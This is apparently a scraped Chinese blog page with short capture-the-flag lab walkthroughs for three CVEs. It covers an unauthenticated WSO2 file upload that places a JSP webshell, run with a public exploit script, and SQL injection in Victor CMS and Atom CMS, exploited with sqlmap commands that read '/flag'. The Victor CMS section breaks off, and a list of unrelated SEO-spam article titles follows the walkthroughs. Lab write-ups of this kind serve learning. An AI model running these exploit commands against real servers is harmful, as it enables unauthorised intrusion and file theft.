当前位置: 首页 > wzjs >正文

昆明驿站网站建设软文外链购买平台

昆明驿站网站建设,软文外链购买平台,做英语教具的网站,怎么用源码搭建网站CVE-2022-29464 靶标介绍: WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。 Git…

CVE-2022-29464

靶标介绍:

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

Github下载EXP,地址:https://github.com/hakivvi/CVE-2022-29464/

执行命令:python exploit.py http://123.58.236.76:38380/ abc.jsp或者在pycharm上运行

根据返回信息可判断abc.jsp已成功上传。

浏览器直接访问返回路径,即可执行任意系统命令。

shell @ http://eci-2zefnfvpsa7cleo0wubm.cloudeci1.ichunqiu.com:9445//authenticationendpoint/abc.jsp

ls

cat /flag

CVE-2022-28060

靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

在登录点抓包

将数据包 粘贴到1.txt

CVE-2022-25488

靶标介绍:

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入之后发现是Not Found页面

访问/admin/ajax/avatar.php,发现是空白页面

查看源码

删除 avatar.php 文件发现能看到整个目录 

查看其他文件得到报错信息

测试一下注入点?id=1

源码发生了变化:

?id=1'

是字符型注入

使用 SQLMap

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"

http://www.dtcms.com/wzjs/385249.html

相关文章:

  • 投资理财网站开发如何进行搜索引擎优化 简答案
  • 做网站需完成的软件重庆网页优化seo
  • 帮我注册一个账号免费seo视频教程
  • 建设干部学校网站首页国外免费建站网站
  • 网络网站制作快速seo关键词优化方案
  • dz网站标题网站链接提交收录
  • 杭州网站推广宣传seo入门版
  • 用什么开发手机网站百度推广四川成都地区服务中心
  • 蒙文网站开发seo学校培训班
  • 外贸独立网站设计关键词快速排名平台
  • wap网站是什么意思啊在线seo工具
  • 做网站包括图片设计吗计算机培训短期速成班
  • 网站建设环境搭建心得体会优化网站标题名词解释
  • 网站登录和权限怎么做网站优化推广方法
  • 怎么做网站站内优化品牌推广计划书怎么写
  • app开发公司掌握我的源代码吗网站关键词如何优化上首页
  • 如何利用网站做推广泉州百度开户
  • laravel如何做网站企业推广宣传方案
  • 昆山网站优化建设网站生成
  • 做网站的人多吗揭阳新站seo方案
  • 网站上海备案看广告赚钱一天50元
  • 购物网站建设情况汇报seo咨询解决方案
  • 龙岗网络推广深圳网站建设亚洲足球最新排名
  • 企业免费网站建设百度关键词竞价排名
  • dw做网站菜单栏直通车推广怎么收费
  • 上海网站建设seodian杭州网站优化公司
  • 国外网站建站搜索引擎广告形式有
  • 小说网站得广告怎么做站长之家怎么用
  • 如何自己免费做网站百度营销客户端
  • 新闻静态网站咋做教育机构网站